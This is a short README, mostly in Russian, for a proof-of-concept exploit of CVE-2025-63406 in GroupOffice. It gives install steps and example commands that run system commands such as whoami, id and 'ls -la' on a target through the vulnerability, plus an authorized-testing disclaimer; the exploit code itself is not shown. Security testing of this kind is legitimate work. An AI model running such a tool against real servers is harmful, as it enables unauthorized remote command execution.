
Небольшой PoC для автоматизации эксплуатации уязвимости CVE-2025-63406.
# Install dependencies
pip install -r requirements.txt
# Or use a virtual environment
python3 -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 CVE-2025-63406.py -u <URL> -n <USERNAME> -p <PASSWORD> -c <COMMAND>
-u, --url: Базовый URL экземпляра GroupOffice (например, http://localhost:9090)-n, --username: Имя пользователя для аутентификации-p, --password: Пароль для аутентификации-c, --command: Системная команда для выполнения (например, whoami, id, ls -la)# Execute whoami command
python3 CVE-2025-63406.py -u http://localhost:9090 -n admin -p password -c whoami
# Execute id command
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c id
# List files in current directory
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "ls -la"
# Get system information
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "uname -a"

⚠️ Этот инструмент предназначен только для авторизованного тестирования. Несанкционированный доступ к компьютерным системам является незаконным.